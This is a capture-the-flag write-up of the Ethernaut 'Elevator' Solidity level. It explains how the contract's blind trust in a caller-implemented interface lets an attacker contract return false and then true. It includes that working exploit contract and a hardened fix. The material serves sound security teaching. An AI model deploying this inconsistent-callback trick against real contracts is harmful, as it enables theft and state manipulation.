Ethernaut #11 Elevator

Ethernaut #11: Elevator – Refusing to Go Where Expected

Intro

Ethernaut's Elevator throws you into a building with a seemingly defiant elevator. Your task: force this elevator to take you to the top floor. However, the provided goTo() function has a peculiar requirement: it only works if the top variable is true when it's called. This leads us down a path of manipulating the contract's logic.

I will be honest, this was very confusing. I could see the interface and the goTo() function, but I needed more to go off of, to finish this challenge. The solution hinges on exploiting the Elevator contract's trust in the external Building interface. We create a malicious contract that pretends to implement this interface but manipulates the return value of the isLastFloor() function. Our contract initially returns false to allow the Elevator to move to the desired floor, then subsequently returns true to satisfy the goTo() function's check. This strategic deception tricks the Elevator into believing we're already at the top floor, accomplishing our goal.


The Challenge

The Elevator contract presents a deceptive interface:

interface Building {
  function isLastFloor(uint) external returns (bool);
}

contract Elevator {
  bool public top;
  uint public floor;

  function goTo(uint _floor) public {
    Building building = Building(msg.sender);

    if (! building.isLastFloor(_floor)) {
      floor = _floor;
      top = building.isLastFloor(floor);
    }
  }
}
        

The Vulnerability: Untrusted Interfaces

  • Loose Interface: The goTo() function blindly trusts the Building interface. An adversarial contract implementing that interface can control what isLastFloor() returns.
  • State Manipulation: The goTo() function calls isLastFloor() twice. This gives us an opportunity to trick it.

The Exploit

  1. The Imposter Contract: We'll create a malicious contract that implements the Building interface. Here's the trick: the first time isLastFloor() is called, it returns false. The second time it returns true.
  2. Calling the Elevator: We'll deploy our imposter contract, then call the Elevator's goTo() function and specify the top floor.
  3. Fooling the System:
       • Call #1 to isLastFloor(): Our imposter returns false, the Elevator moves us to the top floor.
       • Call #2 to isLastFloor(): Our imposter now returns true, satisfying the goTo() function's requirement.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Building interface that the Elevator expects its caller (msg.sender) to implement
interface Building {
  function isLastFloor(uint) external returns (bool);
}

interface IElevator {
    function goTo(uint _floor) external;
}

contract HackBuilding is Building {
    // Starts as true so that the first toggle makes isLastFloor() return false
    bool public last = true;

    // Flips on every call: returns false on the first call, true on the second
    function isLastFloor(uint) external override returns (bool) {
        last = !last;
        return last;
    }

    function goToTop(address _elevatorAddr) public {
        // Call the instance's goTo() from this contract, so that msg.sender is
        // this contract and the Elevator calls back into isLastFloor() above
        IElevator(_elevatorAddr).goTo(1);
    }
}

My Takeaways

  • Aha! Moment: When I realized the Elevator blindly trusts any contract claiming to be a Building, the exploit path became clear.
  • Key Lesson: Never trust external contracts without careful consideration. Interfaces are good practice but don't guarantee the behavior of the implementing contract.
  • Potential Fixes: Consider access controls on who can implement sensitive interfaces, or validate the responses of external calls.
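
The two potential fixes above, sketched as an added example that is not part of the original article or the Ethernaut level. ElevatorHardened and its constructor argument are hypothetical, and the sketch assumes the building's address is known when the elevator is deployed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: hardened variant of the Elevator shown earlier.
interface Building {
    // Declaring the function `view` makes the compiler call it with
    // STATICCALL, so an implementation that writes storage during the
    // call (like the toggle in HackBuilding) reverts.
    function isLastFloor(uint256) external view returns (bool);
}

contract ElevatorHardened {
    bool public top;
    uint256 public floor;

    // Assumption: one building is registered at deployment and never changes,
    // instead of treating whoever calls goTo() as the building.
    Building public immutable building;

    constructor(Building _building) {
        building = _building;
    }

    function goTo(uint256 _floor) public {
        // Ask the external contract exactly once and reuse the answer, so the
        // check and the value stored in `top` can never disagree.
        bool last = building.isLastFloor(_floor);

        if (!last) {
            floor = _floor;
            top = last; // same answer as the check above, so false here
        }
    }
}
```

The `view` modifier alone does not make two separate calls agree, because a view function can still read state that changed between them. Caching the single answer is what removes the inconsistency.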


The Value of Ethernaut

Ethernaut challenges highlight the nuanced ways in which seemingly isolated smart contracts can be manipulated through their interactions.

Call to Action

Thinking like an adversary is key to developing robust smart contracts. Have you tackled Ethernaut Level 11?

Alternative Exploits?

I'm always interested in learning other approaches! Share yours in the comments!

Let me know if you'd like more detail on any aspect!


Intrigued to explore your insights on tackling Challenge 11: Elevator in the Ethernaut series! Your expertise in solidity and blockchain security is always enlightening.
